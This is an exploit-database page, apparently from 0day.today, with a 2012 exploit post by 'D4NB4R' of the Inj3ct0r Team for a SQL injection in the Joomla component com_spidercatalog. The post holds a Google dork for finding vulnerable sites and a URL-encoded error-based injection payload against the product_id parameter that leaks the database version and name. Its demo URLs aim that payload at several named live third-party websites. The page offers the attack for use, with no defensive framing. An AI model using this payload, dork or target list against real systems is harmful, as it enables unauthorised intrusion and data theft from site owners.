0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Joomla Component com_spidercatalog SQL injection Vulnerability
[1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm D4NB4R member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#Exploit Title: Joomla com_spidercatalog SQL injection Vulnerability
Dork: inurl:index.php?option=com_spidercatalog
Date: [31-10-2012]
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
Vendor: http://www.web-dorado.com/
Demo: http://www.web-dorado.com/products/joomla-catalog.html
Version: 1.1 (last update on Sep 25, 2012)
License: GPLv2 or later Commercial
Tested on: [Linux(Arch)-Windows(7ultimate)]
Descripcion:
Spider Catalog for Joomla! is a convenient tool for organizing the products represented on your website into catalogs. Each product on the catalog is assigned with a relevant category, which makes it easier for the customers to search and identify the needed products within the catalog. It is possible to add an unlimited number of parameters for each of the categories in the catalog in order to allow a detailed representation of the product on the catalog. Moreover, each product on the catalog can be accompanied with an image. Customers are provided with the possibility of rating the products available on the catalog, as well as writing customer reviews that will appear under the catalog products. Spider Catalog provides you with a high level of customization concerning almost all the aspects of the catalog, ranging from background colors and text size inside the product cell to the number of products in the row and the number of customer reviews per catalog page.
Vulnerable Parameter Name:
product_id
Parameter Type:
Querystring
Attack Pattern:
-{Valid id}%27%20or%201%3d1%2b%28select%201%20and%20row%281%2c1%29%3E%28select%20count%28*%29%2cconcat%28CONCAT%28version%28%29,0x3D,database%28%29,0x3D,0x3D,0x3D%29%2c1111%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29%2b%27&view=showproduct&page_num=1&back=1
Exploit Demo:
SQLi : SQL injection
http://localhost/index.php?option=com_spidercatalog&product_id=-1%27%20or%201%3d1%2b%28select%201%20and%20row%281%2c1%29%3E%28select%20count%28*%29%2cconcat%28CONCAT%28version%28%29,0x3D,database%28%29,0x3D,0x3D,0x3D%29%2c1111%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29%2b%27&view=showproduct&page_num=1&back=1
http://www.wbtcinterior.com/index.php?option=com_spidercatalog&product_id=-198%27%20or%201%3d1%2b%28select%201%20and%20row%281%2c1%29%3E%28select%20count%28*%29%2cconcat%28CONCAT%28version%28%29,0x3D,database%28%29,0x3D,0x3D,0x3D%29%2c1111%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29%2b%27&view=showproduct&page_num=1&back=1
http://spidershopdemo.web-dorado.com/index.php?option=com_spidercatalog&product_id=-198%27%20or%201%3d1%2b%28select%201%20and%20row%281%2c1%29%3E%28select%20count%28*%29%2cconcat%28CONCAT%28version%28%29,0x3D,database%28%29,0x3D,0x3D,0x3D%29%2c1111%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29%2b%27&view=showproduct&page_num=1&back=1
http://www.lausierfamilygardens.com/grow/index.php?option=com_spidercatalog&product_id=-1%27%20or%201%3d1%2b%28select%201%20and%20row%281%2c1%29%3E%28select%20count%28*%29%2cconcat%28CONCAT%28version%28%29,0x3D,database%28%29,0x3D,0x3D,0x3D%29%2c1111%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29%2b%27&view=showproduct&page_num=1&back=1
Greetz: All Member Inj3ct0r Team * m1nds group (www.m1nds.com)* pilot * aku * navi_terrible * dedalo * ksha
* shine * devboot * r0073r * indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 Jago-dz * Kha&miX * T0xic
* Ev!LsCr!pT_Dz * By Over-X *Saoucha * Cyber Sec * theblind74 * onurozkan * n2n * Meher Assel
* L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects
* aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * MR.SoOoFe
* ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
# 0day.today [2024-11-14] #